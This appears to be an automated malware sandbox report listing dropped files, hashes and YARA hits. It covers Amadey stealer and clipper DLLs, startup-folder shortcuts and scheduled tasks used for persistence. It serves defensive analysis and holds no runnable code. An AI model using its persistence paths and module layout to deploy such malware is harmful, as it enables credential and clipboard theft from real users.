                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                        Entropy (8bit):3.99018874605566
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8W2dSOTyKxRbHjidAKZdA1vehDiZUkwqehWy+R:83joYy
                                                                                                                                                                                                                                        MD5:BAE5DCF3E04008EBAEFB5A63B63BB10E
                                                                                                                                                                                                                                        SHA1:1FD393E8CED5CC5D88C207C5E4864358FE7C92B2
                                                                                                                                                                                                                                        SHA-256:BB1C669CBC53C0845842E54D7670E08EB9CB6C89C9616254DB092DB9C2FD0453
                                                                                                                                                                                                                                        SHA-512:2B0F9A4A6DD64CBB926DC6362CEEF8650FB4B0768422D118E92A07ED1D45C7325FFD0755FC82653220617845391AED98556CE194660974F2A2D41087FEE998F3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....s]o6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                        Entropy (8bit):3.981170729251942
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8042dSOTyKxRbHjidAKZdA1hehBiZUk1W1qehky+C:84j49Ey
                                                                                                                                                                                                                                        MD5:C8D2D6D9D6FD607398A2275089247F02
                                                                                                                                                                                                                                        SHA1:598C79905C73C3E8EECD70655E833475F6EDED36
                                                                                                                                                                                                                                        SHA-256:189816EB3E8BC556431F28810E4AB1239FA361D3AD0CACBF541A0BE358D501A1
                                                                                                                                                                                                                                        SHA-512:366D78DDC6508FF020BEF3C0F513B9B7FF6C3139D30AFE7A5B55C99023EF61F515256B1DF2303FC88174C3C213C673B9BA1153E3DFA04A8B7C198B4260C01915
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....;.6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                                                        Entropy (8bit):3.9905717892793793
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8JA2dSOTyKxRbHjidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbuy+yT+:8TjWT/TbxWOvTbuy7T
                                                                                                                                                                                                                                        MD5:4F7303520F705BBCB72C76B4E227608E
                                                                                                                                                                                                                                        SHA1:54BA5F537EA62E28F9298A2178D62B7060024992
                                                                                                                                                                                                                                        SHA-256:0805745057D8B5872CAD1E92BFF805BA5B72DBF28F08CAB50419572EB1901B73
                                                                                                                                                                                                                                        SHA-512:84AF7A2E3D5C79C782EA4A994B555012A972455BF98B576F56FD95AB084B6CB43E615A566F5CA849E7323750D1C5B4FBD4F0219B38571136D43ADD246A409FCA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....Pd6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 18:35:34 2024, mtime=Tue Apr 23 18:35:34 2024, atime=Tue Apr 23 18:35:33 2024, length=2469936, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):987
                                                                                                                                                                                                                                        Entropy (8bit):5.005138030887183
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:8sI4fVA88COlsY//WjLm/17C8wPyllAzKpyZ2mjAu9HyB4gXURUJJoDuZ2UBmV:8Mfl8FZ+3mtOfaompydAjB4SaUCuzBm
                                                                                                                                                                                                                                        MD5:59D91D7A8BFF0A9E61EC8C642C752EB4
                                                                                                                                                                                                                                        SHA1:98E7CCDFFE44D1E03CD951498EFC971612365105
                                                                                                                                                                                                                                        SHA-256:06F0592EAF0F27F929CDA3521B18C61BB71F343253F42977A4045C02FD127F00
                                                                                                                                                                                                                                        SHA-512:58E3F6CA300412B11C410B9AFE08AD28D46ECBBD41DB73259D60D4395B4F31006D5531CAB29FA3183096E3641D40B165FD5E43650BABDA520405B2F8638D3EDA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.... ......h....q..h.....<eh....0.%.......................:..DG..Yr?.D..U..k0.&...&...... M......14*.....vPo........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X;.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Xu...Roaming.@......DWSl.Xu.....C.....................Y...R.o.a.m.i.n.g.....n.1......Xr...DRIVER~1..V......Xr..Xt............................!.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.....z.2.0.%..Xq. .UNIVER~1.EXE..^......Xr..Xr...... ....................".\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.......x...............-.......w............P.{.....C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe..7.....\.....\.R.o.a.m.i.n.g.\.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.`.......X.......932923...........hT..CrF.f4... .uW.......,...W..hT..CrF.f4... .uW.......,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tzgsecure.lnk (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 18:35:34 2024, mtime=Tue Apr 23 18:35:34 2024, atime=Tue Apr 23 18:35:33 2024, length=2469936, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):987
                                                                                                                                                                                                                                        Entropy (8bit):5.005138030887183
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:8sI4fVA88COlsY//WjLm/17C8wPyllAzKpyZ2mjAu9HyB4gXURUJJoDuZ2UBmV:8Mfl8FZ+3mtOfaompydAjB4SaUCuzBm
                                                                                                                                                                                                                                        MD5:59D91D7A8BFF0A9E61EC8C642C752EB4
                                                                                                                                                                                                                                        SHA1:98E7CCDFFE44D1E03CD951498EFC971612365105
                                                                                                                                                                                                                                        SHA-256:06F0592EAF0F27F929CDA3521B18C61BB71F343253F42977A4045C02FD127F00
                                                                                                                                                                                                                                        SHA-512:58E3F6CA300412B11C410B9AFE08AD28D46ECBBD41DB73259D60D4395B4F31006D5531CAB29FA3183096E3641D40B165FD5E43650BABDA520405B2F8638D3EDA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.... ......h....q..h.....<eh....0.%.......................:..DG..Yr?.D..U..k0.&...&...... M......14*.....vPo........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X;.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Xu...Roaming.@......DWSl.Xu.....C.....................Y...R.o.a.m.i.n.g.....n.1......Xr...DRIVER~1..V......Xr..Xt............................!.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.....z.2.0.%..Xq. .UNIVER~1.EXE..^......Xr..Xr...... ....................".\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.......x...............-.......w............P.{.....C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe..7.....\.....\.R.o.a.m.i.n.g.\.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.`.......X.......932923...........hT..CrF.f4... .uW.......,...W..hT..CrF.f4... .uW.......,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):112128
                                                                                                                                                                                                                                        Entropy (8bit):6.400356358225577
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
                                                                                                                                                                                                                                        MD5:154C3F1334DD435F562672F2664FEA6B
                                                                                                                                                                                                                                        SHA1:51DD25E2BA98B8546DE163B8F26E2972A90C2C79
                                                                                                                                                                                                                                        SHA-256:5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F
                                                                                                                                                                                                                                        SHA-512:1BCA69BBCDB7ECD418769E9D4BEFC458F9F8E3CEE81FEB7316BB61E189E2904F4431E4CC7D291E179A5DEC441B959D428D8E433F579036F763BBAD6460222841
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1285632
                                                                                                                                                                                                                                        Entropy (8bit):6.460276790319054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:2vkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggv4+yC7:2sMPSYcS5wPi095PbgS4
                                                                                                                                                                                                                                        MD5:F35B671FDA2603EC30ACE10946F11A90
                                                                                                                                                                                                                                        SHA1:059AD6B06559D4DB581B1879E709F32F80850872
                                                                                                                                                                                                                                        SHA-256:83E3DF5BEC15D5333935BEA8B719A6D677E2FB3DC1CF9E18E7B82FD0438285C7
                                                                                                                                                                                                                                        SHA-512:B5FA27D08C64727CEF7FDDA5E68054A4359CD697DF50D70D1D90DA583195959A139066A6214531BBC5F20CD4F9BC1CA3E4244396547381291A6A1D2DF9CF8705
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                        C:\Windows\Tasks\chrosha.job

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000012001\amert.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):292
                                                                                                                                                                                                                                        Entropy (8bit):3.437428062412027
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:e9/CnX45ZsUEZ+lX1ErCqdtFXqYEp5t/uy0lbwct0:ksDQ1EeqNfXVbpt0
                                                                                                                                                                                                                                        MD5:71C085DC838CF5F64919796AE4408F04
                                                                                                                                                                                                                                        SHA1:E9E3E11632407E68771E8A5B49E0AD5E313CA84C
                                                                                                                                                                                                                                        SHA-256:B19729A27D368FC6F74DC6B1F79AA1828C74CFF41E77C27A0AADF2562CAE5F7E
                                                                                                                                                                                                                                        SHA-512:E7A88557EF6F16613190553184E1A4FA512BBFB43FA0EF5EF487E0531B92EBE13736341CE1634C07487CA93291CD5A50A50DA96B44ED73C2EB04A1BA344B4B55
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.......b..K....2..TF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.d.0.a.b.1.5.8.0.4.\.c.h.r.o.s.h.a...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................#.@3P.........................

                                                                                                                                                                                                                                        C:\Windows\Tasks\explorta.job

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):294
                                                                                                                                                                                                                                        Entropy (8bit):3.4079652251083594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:h20DVXUG5ZsUEZ+lX1dMlylRdtFXqYEp5t/uy0lbBut0:hDRYQ12oDNfXVbBut0
                                                                                                                                                                                                                                        MD5:49DBEA25D1A422FAA3F03C8F02BEA666
                                                                                                                                                                                                                                        SHA1:0D6AA82A67150FE6FED746AEB5EB07816816AEC5
                                                                                                                                                                                                                                        SHA-256:93DC867038D0C3192334DE48B5F5D0AEF4892F74555FE7A9BF5400610916F24A
                                                                                                                                                                                                                                        SHA-512:29FED22D9099814AA7E40A1A355CA18B590448FFEF7EB0A8DA784BC40CA01F6B86B24D320AB6D46ADFC6106750675824854B42C8026F57439142E3DA5849FCBE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.....d.F-9G. mx...F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.5.4.5.4.e.6.f.0.6.2.\.e.x.p.l.o.r.t.a...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................".@3P.........................

                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                        Entropy (8bit):4.428697541043145
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:3Svfpi6ceLP/9skLmb0OT2WSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:ivloT2W+EZMM6DFyl03w
                                                                                                                                                                                                                                        MD5:C8121062DFDDAF99D6BAC19AEA9E9008
                                                                                                                                                                                                                                        SHA1:D0FC9169E8A7E9C4CE1EB2352868ADC65465B093
                                                                                                                                                                                                                                        SHA-256:4EE31B408DCE0A05316CAA8402B34AD151B2A8D44749B1EAC33BD26D3C30F7D8
                                                                                                                                                                                                                                        SHA-512:CF99E4EAAF6072CE0DFD21D448083BAD8DD0CEA92F992B4A3CA45C2911FDD36DE606DCD9747AF3CDD0FD9348C6FD1EF1555D126C491D2781EBFFEF642A79840C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.%.C.................................................................................................................................................................................................................................................................................................................................................j.w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        Chrome Cache Entry: 254

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1631)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):38525
                                                                                                                                                                                                                                        Entropy (8bit):5.3838229197405845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ka4ZsJiVqZZIpNGVMfgXafCcgBRyLa7l6txRjXbwm75/JgZRrQAT6l:bZCfVfCCa7qxR3nt/JgT6
                                                                                                                                                                                                                                        MD5:F269DC67D0E2355F1A50E500D5BE54A8
                                                                                                                                                                                                                                        SHA1:96A3A5C465D8A6B18373BF73138DBEB2B03AE534
                                                                                                                                                                                                                                        SHA-256:7FAB6151E7F2088D3E76373C563CCC3F9AE1523C49E8D38225F82158F8557954
                                                                                                                                                                                                                                        SHA-512:4B81B50467C5CD3CB11DCA60F6A9438214557565BEE34558B128BE17628965A6184D5845E4B61B883D8C4F140BE97259A16AF5361280EE1ADE4F0E674A4B2101
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.eIcQTVVx-II.es5.O/ck=boq-identity.AccountsSignInUi.abUGhSwZr5E.L.B1.O/am=PsAiOnEsAGLEeeADFAVCBgAAAAAAAAAArQFmBg/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFktUL8CS9ma2bFQwiLvYX2iyBOiw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:NoODMc;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe"
                                                                                                                                                                                                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.mpa=function(a){var b=0,c;for(c in a)b++;return b};_.npa=function(a){return a.hh&&"function"==typeof a.hh?a.hh():_.ja(a)||"string"===typeof a?a.length:_.mpa(a)};_.qn=function(a){if(a.Xg&&"function"==typeof a.Xg)return a.Xg();if("undefined"!==typeof Map&&a instanceof Map||"undefined"!==typeof Set&&a instanceof Set)return Array.from(a.values());if("string"===typeof a)return a.split("");if(_.ja(a)){for(var b=[],c=a.length,d=0;d<c;d++)b.push(a[d]);return b}return _.ob(a)};._.opa=function(a){if(a.Vg&&"function"==typeof a.Vg)return a.Vg();if(!a.Xg||"function"!=typeof a.Xg){if("undefined"!==typeof Map&&a instanceof Map)return Array.from(a.keys());if(!("undefined"!==typeof Set&&a instanceof Set)){if(_.ja(a)||"string"===typeof a){var b=[];a=a.length;for(var c=0;c<a;c++)b.push(c);return b}return _.pb(a)}}};.var ppa,spa,rpa,qpa,Gn,In,Epa,vpa,xpa,wpa,Apa,ypa;ppa=function(a,b,c){if(b)re

                                                                                                                                                                                                                                        Chrome Cache Entry: 255

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4199)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):19278
                                                                                                                                                                                                                                        Entropy (8bit):5.369599228603606
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:cvdvKJdlmqS6Y09al9NSQqbZrM+McC4Gw+RXY2RAgpho55WW12:KvV6Y09a3wrHCQ+RIVgwWW12
                                                                                                                                                                                                                                        MD5:CF3995B2563E0EBF8D485583199AA881
                                                                                                                                                                                                                                        SHA1:AD8F16F214600B1C8D4B18E6BC227CBBE7921804
                                                                                                                                                                                                                                        SHA-256:D2D12D9D00DB79F5F874A8A5BF942591D4DB684901EDA33A7CDCA25E6F84377C
                                                                                                                                                                                                                                        SHA-512:B19CF516537D180DD64A6B9ECDD9760085971422511FF59FA05D120B43B4971611429B5A03D7D5384029D1691B6B414F9340701CA337D5CBA429C32CBE8D4310
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
